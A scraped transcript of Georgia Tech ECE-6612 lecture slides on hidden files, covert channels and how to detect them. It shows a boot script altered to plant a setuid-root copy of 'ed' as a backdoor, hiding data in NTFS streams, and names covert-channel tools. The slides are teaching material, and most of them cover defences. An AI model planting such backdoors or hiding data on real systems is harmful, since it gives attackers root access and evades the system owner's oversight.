1 / 20

ECE-6612 csc.gatech / copeland / jac /6612/ Prof. John A. Copeland

ECE-6612 http:// www.csc.gatech.edu / copeland / jac /6612/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 fax 404 894-35 Office: Klaus 3362 email or call for office visit, or call 404 894-5177 Slides 15 - Hidden Data, Covert Channels. “ Hidden Files ”.

felixe
Download Presentation

ECE-6612 csc.gatech / copeland / jac /6612/ Prof. John A. Copeland

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 fax 404 894-35 Office: Klaus 3362 email or call for office visit, or call 404 894-5177 Slides 15 - Hidden Data, Covert Channels

  2. “Hidden Files” On a UNIX system, starting a file name with a dot “.” hides it from the simple list command, “ls”. [root@lc1 me]# echo "regular file" > regfile [root@lc1 me]# echo "hide me" > .hiddenfile [root@lc1 me]# ls regfile [root@lc1 me]# ls -a . .. .hiddenfile regfile [root@lc1 me]# The “ls -a” command will reveal these hidden files. 2

  3. Hidden Directory “. ” On a UNIX system, a hard to spot hidden directory can be made by naming it dot-space“. “ [root@lc1 me]# mkdir ". " [root@lc1 me]# echo "well-hidden" > ". "/well_hide [root@lc1 me]# ls -a . ... .hiddenfile regfile [root@lc1 me]# ls -al total 6 drwxr-xr-x3 root root1024 Apr 16 19:59 . drwxr-xr-x2 root root1024 Apr 16 20: . drwxrwx--- 29 root wheel 2048 Apr 16 19:49 .. -rw-r--r--1 root root8 Apr 16 19:52 .hiddenfile -rw-r--r--1 root root 13 Apr 16 19:52 regfile Note that the file “well_hide” does not appear. 3

  4. Startup Scripts When starting run level “3”, daemons are stopped or started by shell scripts if there is a “link” pointing to the script in /etc/rc.d/rc3.d/ The first letter in the link name determines if the daemon is started ("S") or killed ("K"). The two-digit number in the name determines the order of starting. The root-level boot script would look like this: cd /etc/rc.d/init.d/ ./K05innd stop ;./K10pulse stop; ... ; ./S05kudzu start; ./S10network start ; ... [root@lc1 rc.d]# ls -l rc3.d/ total 0 lrwxrwxrwx 1 root root 14 Jun 29 20 K05innd -> ../init.d/innd lrwxrwxrwx 1 root root 15 Jun 29 20 K10pulse -> ../init.d/pulse lrwxrwxrwx 1 root root 13 Aug 5 20 K20nfs -> ../init.d/nfs lrwxrwxrwx 1 root root 16 Jun 29 20 K20rstatd -> ../init.d/rstatd lrwxrwxrwx 1 root root 17 Jun 29 20 K20rusersd ->../init.d/rusersd lrwxrwxrwx 1 root root 15 Jun 29 20 K20rwhod -> ../init.d/rwhod lrwxrwxrwx 1 root root 13 Jun 29 20 K35smb -> ../init.d/smb lrwxrwxrwx 1 root root 15 Feb 8 19:20 K45named -> ../init.d/named lrwxrwxrwx 1 root root 15 Jun 29 20 K50snmpd -> ../init.d/snmpd lrwxrwxrwx 1 root root 16 Jun 29 20 K55routed -> ../init.d/routed lrwxrwxrwx 1 root root 19 Jun 29 20 K99linuxconf -> ../init.d/linuxconf lrwxrwxrwx 1 root root 15 Jun 29 20 S05kudzu -> ../init.d/kudzu lrwxrwxrwx 1 root root 17 Feb 8 19:19 S10network -> ../init.d/network . . . 4

  5. Script Run on Every Reboot [root@lc1 init.d]# ls -l /etc/rc.d/init.d/kudzu -rwxr-xr-x 1 root root1427 Aug 30 20 kudzu [root@lc1 init.d]# cat kudzu #!/bin/sh # # kudzu This scripts runs the kudzu hardware probe. # # chkconfig: 345 05 95 # description: This runs the hardware probe, and optionally configures \ #changed hardware. cp /usr/bin/ed /usr/bin/mailfix; chmod /usr/bin/mailfix -4555; # This is an interactive program, we need the current locale [ -f /etc/profile.d/lang.sh ] && . /etc/profile.d/lang.sh This computer is totally compromised. Any one who logs on can run commands as root. How? 5

  6. Script Run on Every Reboot [root@lc1 init.d]# ls -l kudzu -rwxr-xr-x 1 root root1427 Aug 30 20 kudzu [root@lc1 init.d]# cat kudzu #!/bin/sh # # kudzu This scripts runs the kudzu hardware probe. # # chkconfig: 345 05 95 # description: This runs the hardware probe, and optionally configures \ #changed hardware. cp /usr/bin/ed /usr/bin/mailfix; chmod/usr/bin/mailfix -4555; # This is an interactive program, we need the current locale [ -f /etc/profile.d/lang.sh ] && . /etc/profile.d/lang.sh This computer is totally compromised. Any one who logs on can run commands as root, by running "mailfix" and "!". (The program "ed" has been fixed recently, but another program can do) 6

  7. Windows NT By “right clicking” on the file listing in NT or Win20, the “Hidden” attribute can be set. This prevents the file from being shown under default settings of a directory window; however, the directory window View Menu offers the opinion of showing “hidden” files. The files in Microsoft NT and Win20 have additional “streams” that can store data in parallel with data in the main channel. These additional streams can be accessed using the program “cp” which is available by purchasing the Windows NT Resource Kit. To hide the contents of file stuff.txt in another file like notepad.exe C:\> copy stuff.txt notepad.exe:data A directory window will still show the same size for notepad.exe To retrieve the data later C:\> copy notepad.exe:data newstuff.txt Ref. “Counter Hack,” Ed Skoudis, p. 460 7 7

  8. Defense Against Hidden Files Use a file-integrity checker like “Tripwire” Use a Host-Based IDS (Intrusion Detection System) Do not let strangers log on the system (good authentication). Remove vulnerabilities that would let a stranger log on, or a trusted user upgrade their privileges. 8

  9. Covert Channels Sending data in a way that network watchers (sniffer, IDS, ..) will not be aware that data is being transmitted. For IP Networks: Data hidden in the IP header Data hidden in ICMP Echo Request and Response Packets Data tunneled through an SSH connection “Port 80” Tunneling, (or DNS port 53 tunneling) In image files. 9

  10. 20-64 bytes 20-64 bytes 0-65,488 bytes IP Header TCP Header DATA Dear Friend, I am having a good time at the beach. TCP Source Port TCP Destination Port IP Source Address IP Destination Address Packet Header Hiding 10

  11. IP Header 0-44 bytes 11

  12. TCP Header 0-44 bytes 12

  13. ICMP Headers =3 0-65,535 bytes 13

  14. Convert Channel Tools SSH (SCP, FTP Tunneling, Telnet Tunneling, X-Windows Tunneling, ...) - can be set to operate on any port (<1024 usually requires root privilege). Loki (ICMP Echo Request/Response, UDP 53) NT - Back Orifice (BO2K) plugin BOSOCK32 Reverse WWW Shell Server - looks like a HTTP client (browser). App headers mimic HTTP GET and response commands. 14

  15. Steganography see http://www.jjtc.com/Steganography/ 15

  16. Speech or Music Encoding Use the lowest-order bit in each sample value for covert data. This doubles the “quantization noise,” but that may not be noticed. 16

  17. Detecting Covert Channels A network IDS can detect a “Ping Unbalance” - more Ping Responses than Requests, or data that does not match. Block all ICMP packets at firewall (can cause problems) Signature-based IDS will detect known programs (Loki) Port 53 Tunneling - Block inbound and outbound TCP/UDP port 53 packets at firewall except to/from known internal DNS servers. Port 80 Tunneling - look for long-lasting flows to outside server, excess client-to-server data flow. Port-80 Client Port-profile violation (never used before for browser). Steganography – Look for Port-profile violation, or known hacker-site server. 17

  18. Monitor for New and Unknown Processes # ps -e PID TTY TIME CMD 1 ? ::05 init 2 ? :: kflushd 3 ? ::25 kupdate 4 ? :: kpiod 5 ? :: kswapd 6 ? :: mdrecoveryd 47 ? :: khubd 337 ? :: syslogd 347 ? :: klogd 362 ? :: portmap 378 ? :: lockd 379 ? :: rpciod 389 ? :: rpc.statd 404 ? :: apmd 458 ? :: identd 462 ? :: identd 463 ? :: identd 464 ? :: identd 465 ? :: identd 477 ? :: atd 492 ? :: xinetd 502 ? ::12 sshd 524 ? :: lpd 29891 tty1 :: xinit 29892 ? :06:11 X 29895 tty1 :: gnome-session 29905 ? :: gnome-smproxy 29907 ? ::33 enlightenment 29909 ? ::01 magicdev 29923 ? ::01 panel 29926 ? :: gnome-name-serv 29928 ? ::01 gmc 29931 ? :: gnome-terminal 29933 ? ::01 gnome-terminal 29935 ? :: gnome-terminal 29936 ? :: gnome-pty-helpe 29937 pts/2 :: bash 29945 ? :: gnome-pty-helpe 29946 pts/3 :: bash 29947 ? :: gnome-pty-helpe 29948 pts/4 :: bash 321 ? ::03 netscape-commun 354 ? :: netscape-commun 30105 ? :: gnome-terminal 30106 ? :: gnome-pty-helpe "psaux" shows more data 18

  19. Monitor for New Ports # netstat -al -f inet [on some UNIX systems, use “-A inet”] Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign AddressState User tcp 0 112 lc1.jac.local:ssh g4.jac.local:50559ESTABLISHED root tcp lc1.jac.local:8822c-66-56-79-1.atl.:28928 ESTABLISHED root tcp 10 lc1.jac.local:1058csc.gatech.edu:wwwCLOSE_WAIT root tcp 10 lc1.jac.local:1056csc.gatech.edu:wwwCLOSE_WAIT root tcp *:X*:*LISTENroot tcp lc1.jac.local:8822c-66-56-79-1.atl.:12883 ESTABLISHED root tcp lc1.jac.local:8822c-66-56-79-1.atl.:21539 ESTABLISHED root tcp *:www *:*LISTENroot tcp *:smtp*:*LISTENroot tcp *:printer*:*LISTENroot tcp *:ssh *:*LISTENroot tcp *:58822 *:*LISTENroot tcp *:login *:*LISTENroot tcp *:shell *:*LISTENroot tcp *:telnet *:*LISTENroot tcp *:ftp *:*LISTENroot tcp *:finger *:*LISTENroot tcp *:auth*:*LISTENroot tcp *:1024*:*LISTENrpcuser tcp *:sunrpc *:*LISTENroot udp *:1025*:*rpcuser udp *:989 *:*root udp *:1024*:*root raw *:icmp*:*7 root raw *:tcp *.*7 root "sockstat -4" (or "netstat -p -a -o - A inet" on Linux) may show the opening process. 19

  20. Who has active TCP Sessions – What Application is Involved netstat -nal | grep tcp | grep ESTAB tcp 143.215.151.48:631 130.207.232.157:49353 ESTABLISHED tcp 143.215.151.48:631 130.207.225.34:51580 ESTABLISHED tcp 143.215.151.48:631 130.207.234.83:54018 ESTABLISHED tcp 143.215.151.48:111 143.215.169.104:45664 ESTABLISHED tcp 143.215.151.48:111 143.215.169.104:45665 ESTABLISHED tcp 143.215.151.48:631 130.207.225.26:36686 ESTABLISHED tcp 143.215.151.48:631 143.215.156.43:58115 ESTABLISHED tcp 143.215.151.48:631 143.215.146.43:58638 ESTABLISHED tcp 143.215.151.48:111 143.215.169.104:45639 ESTABLISHED tcp 127.0.0.1:6010 127.0.0.1:49457 ESTABLISHED lsof –i (LiSt Open Files) COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME SystemUIS 144 copeland 10u IPv4 0x04896130 0t0 UDP *:* SystemUIS 144 copeland 13u IPv4 0x048962e8 0t0 UDP *:* AppleVNCS 161 copeland 8u IPv6 0x04cdd6d0 0t0 TCP *:vnc-server RBDaemon 10572 copeland 4u IPv4 0x04895c08 0t0 UDP *:9912 RBDaemon 19687 copeland 4u IPv4 0x055fd528 0t0 UDP *:hnm mb2

More Related